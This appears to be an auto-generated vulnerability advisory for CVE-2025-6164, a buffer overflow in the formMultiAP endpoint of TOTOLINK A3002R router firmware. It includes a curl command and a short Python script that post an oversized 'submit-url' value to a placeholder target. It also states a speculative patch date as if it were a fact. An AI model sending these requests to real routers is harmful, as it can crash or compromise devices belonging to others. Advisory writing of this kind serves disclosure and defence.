TOTOLINK A3002R, Buffer Overflow Vulnerability, CVE-2025-6164 (Critical)

How the CVE Works

CVE-2025-6164 is a buffer overflow vulnerability in TOTOLINK A3002R firmware version 4.0.0-B20230531.1404. The flaw resides in the `/boafrm/formMultiAP` endpoint, which mishandles HTTP POST requests. By manipulating the `submit-url` argument, an attacker can overflow the buffer, leading to arbitrary code execution or a system crash. The attack is remotely exploitable and requires no authentication. PoC exploits have been publicly disclosed, which increases the risk of active exploitation.

DailyCVE Form

Platform: TOTOLINK A3002R
Version: 4.0.0-B20230531.1404
Vulnerability: Buffer Overflow
Severity: Critical
Date: 06/23/2025

Prediction: Patch by 07/15/2025

What Undercode Say

curl -X POST -d "submit-url=<OVERFLOW_PAYLOAD>" http://<TARGET_IP>/boafrm/formMultiAP

import requests
payload = "A" * 1024  # Example buffer overflow payload
requests.post("http://<TARGET_IP>/boafrm/formMultiAP", data={"submit-url": payload})

How the Exploit Works

  • Craft malicious HTTP POST request with oversized submit-url.
  • Trigger buffer overflow for RCE or DoS.
  • Use public PoC for reliable exploitation.

Protection from this CVE

  • Apply vendor patch.
  • Disable exposed endpoints.
  • Use network segmentation.

Impact

  • Remote code execution.
  • System compromise.
  • Unauthorized access.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode